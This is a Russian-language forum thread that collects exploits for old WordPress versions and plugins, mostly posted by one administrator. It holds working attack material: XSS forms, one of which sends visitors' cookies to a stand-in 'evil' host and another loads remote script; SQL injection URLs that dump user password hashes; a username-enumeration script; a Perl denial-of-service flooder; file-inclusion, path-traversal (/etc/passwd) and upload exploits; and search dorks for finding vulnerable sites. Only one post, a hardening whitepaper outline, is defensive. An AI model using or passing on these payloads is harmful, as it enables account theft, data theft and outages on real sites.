 |
 |
Приветствую Вас Гость | RSS |
 |
 |
 |
|
    |
 | |  |
|
|
Обзор уязвимостей WordPress
| | |
| Decide | Дата: Среда, 14.11.2012, 10:21 | Сообщение # 2 |
 Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| simple PoC:
Код HTML:
<html>
<head></head>
<body>
<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
cookie theft PoC:
Код HTML:
<html>
<head></head>
<body>
<form method="post"
action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
>
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="anyusername" />
<input type="hidden" name="user_email" id="user_email"
value='"><script>eval(location.hash.substr(1))</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
unrestricted script insertion from third-party site
(we prove we can
inject ANY JS):
Код HTML:
<html>
<head></head>
<body>
<form method="post" action="http://victim/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="test" />
<input type="hidden" name="user_email" id="user_email"
value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
__________________
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:22 | Сообщение # 3 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| 07 июня, 2007
Программа: WordPress 2.2, возможно более ранние версии
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST
Вот пример запроса
Код HTML:
<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>Здесь логин</value></param>
<param><value>Сдесь пароль</value></param>
<param><value>1</value></param>
<param><value>0 UNION SELECT USER()</value></param>
</params>
</methodCall>
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:22 | Сообщение # 4 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress 2.2 Username Enumeration
Code #!/bin/bash
# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/
if [ $# -ne 2 ]
then
echo "need to parameters! correct syntax is:"
echo "$0 <ip-or-hostname> <wordlist-filename>"
exit 1
fi
for U in `cat $2`
do
#echo $U
if curl -s -d
"log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url
"http://$1/wordpress/wp-login.php" | grep -i 'Incorrect password' >
/dev/null
then
echo "username found!: $U" # print username found on screen
echo $U >> $0.found # save results to file equals to
script name plus .found extension
fi
done |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:22 | Сообщение # 5 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress Security Whitepaper
Table of Contents
* Introduction
* Installing WordPress
o Accessing your WordPress tables
o Changing your WordPress Table Prefix
o Before Installation
o Manually Change
o Through WP Prefix Table Changer
* Preparing the Blog
o Changing your Admin Username
o Create a new limited access user
* Hardening your WP Install
o Restricting wp-content & wp-includes
o Restricting wp-admin
o Block all except your IP
o Password Required - .htpasswd
o The .htaccess file
o The .htpasswd file
* MUSTHAVE Plugins
o WPIDS - Detect Intrusions
o WordPress Plugin Tracker – Are you updated?
o WordPress Online Security Scanner
http://blogsecurity.net/projects/secure-wp-whitepaper.pdf
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:24 | Сообщение # 6 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress PHP_Self Cross-Site Scripting Vulnerability
Code <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es"> <head> <title>Wordpress XSS PoC</title> </head> <body id="main"> <form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post"> <p> <textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea> </p> <p> <input type="hidden" name="action" value="update" /> <input type="hidden" name="file" value="wp-content/themes/default/index.php" /> </p>[code] </form> <script type="text/javascript"> // <![CDATA[ document.forms[0].submit(); // ]]> </script> </body> </html>
Vulnerable URI
Code /wp-admin/plugins.php?page=akismet-key-config
Vulnerable Post variable:
Code _wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,41))</script>" |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:24 | Сообщение # 7 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0
WP <2.3
http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script >alert(1)</script>
WordPress 2.0.1 Remote DoS Exploit
Code #!perl #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev <img src="http://s49.ucoz.net/sm/1/wink.gif" border="0" align="absmiddle" alt="wink" /> #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http:\/\/)//eg; #no http:// for ($i=0; $i<99999999999999999999999999999999999999999999999999 99999999999999999999; $i++) #0_o <img src="http://s49.ucoz.net/sm/1/smile.gif" border="0" align="absmiddle" alt="smile" /> { $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x 6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S ! $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB"; $len = length $data; $foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n". "Accept: */*\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+"; } #s33 if the server is down print "\n\n"; system('ping $host'); sub usage { print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n"; print "\te-mail: matrix_k\@abv.bg\n"; print "\tusage: \n"; print "\t$0 <host> </dir/>\n"; print "\tex: $0 127.0.0.1 /wordpress/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n"; exit(); }; |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:25 | Сообщение # 8 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Раскрытие Пути
Код:
http://[target]/[path]/wp-content/plugins/akismet/akismet.php
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Code #Author: S.W.A.T. #cont@ct: svvateam@yahoo.com -------------------------------------------------------------------------------- ------------------------- ------------------------------------------------------- Application : BackUpWordPress 0.4.2b Download : http://wordpress.designpraxis.at/download/backupwordpress.zip -------------------------------------------------------------------------------- Vuln : require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php"; -------------------------------------------------------------------------------- Exploit: http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3? http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3? & other Files & Folders In The [Archive] Folder -------------------------------------------------------------------------------- Dork: "inurl:/plugins/BackUp" |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:25 | Сообщение # 9 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Sql Injection in wordpress 2.3.1
Code Author : Beenu Arora
Mail : beenudel1986 (at) gmail (dot) com [email concealed]
Application : WordPress (2.3.1)
Homepage: http://wordpress.org/
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter : P
POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/* |
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:34 | Сообщение # 10 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress Charset SQL Injection Vulnerability
Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection.
( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html )
Exploit:
http://localhost/wordpre....,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23
_http://ilia.ws/archives/103-mysql_real_escape_string-
versus-Prepared-Statements.html
Код:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=== WordPress Charset SQL Injection Vulnerability ===
Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc);
}
Finally, escape() method belongs to wp-includes/wp-db.php:
function escape($string) {
return addslashes( $string ); // Disable rest for now, causing problems
......
}
3. Proof of concept
a. After WordPress installation, modify wp-config.php to make sure
it uses certain character set for database connection (Big5 can
also be used):
define('DB_CHARSET', 'GBK');
b. http://localhost/wordpre....,16,17, 18,19,20,21,22,23,24/**/FROM/**/wp_users%23
4. Workaround
Note: This vulnerability only exists for database queries performed
using certain character sets. For databases created in most other
character sets no remedy is needed.
a. It is recommended to convert WordPress database to use character sets not
vulnerable to such SQL exploit. One such charset is UTF-8, which does not
use backslash ('\') as part of character and it supports various languages.
b. Alternatively, edit WordPress theme to remove search capability.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org
iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:35 | Сообщение # 11 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress 2.3.1 - Broken Access Control is_admin()
Получение админских привелегий в обход пароля.
Код:
By Michael Brooks
Vulnerability:Broken Access Control
Homepage:http://wordpress.org/download
Software: Wordpress
Version affected:2.3.1 (Latest at the time of writing)
The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.
This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted.
exploit:
htttp://localhost/wordpress/'wp-admin/
This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
htttp://localhost/wordpress/'wp-admin/
Vulnerable function:
line 34, in ./wp-includes/query.php.
function is_admin () {
global $wp_query;
return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}
The same flaw is duplicted in again on line 645 of the same file.
This url: htttp://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true. This flaw works regardless of regis
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:35 | Сообщение # 12 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
$path = $_GET['path'];
$size = $_GET['size'];
$base = dirname(__FILE__) . "/..";
$cache = "$base/cache/$size/$path";
In Line 22 :
readfile($cache);
POC :
/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:35 | Сообщение # 13 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| For attacking admin only (at options page):
1
Код HTML:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit © 2007 MustLive. http://websecurity.com.ua</title >
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:36 | Сообщение # 14 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| directory traversal vulnerabilities in WP 2.0.11(win only)
PHP код:
function validate_file(..)
if (false !== strpos($file, ‘./’))
Код:
Proof of concept:
http://site/wp-admin/index.php?page= \..\..\.htaccess
|
| |
| |
| Decide | Дата: Среда, 14.11.2012, 10:40 | Сообщение # 15 |
|
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
Файловый менеджер находится тут:
Code http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
После загрузки скрипт вы найдете в этом каталоге:
Код:
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)
Запрос для поиска:
Код:
plugins/wp-filemanager/
inurl:/wp-filemanager/
|
| |
| |
| |
 | |  |
|
|
|
| Пятница, 26.04.2024, 11:04 |
|
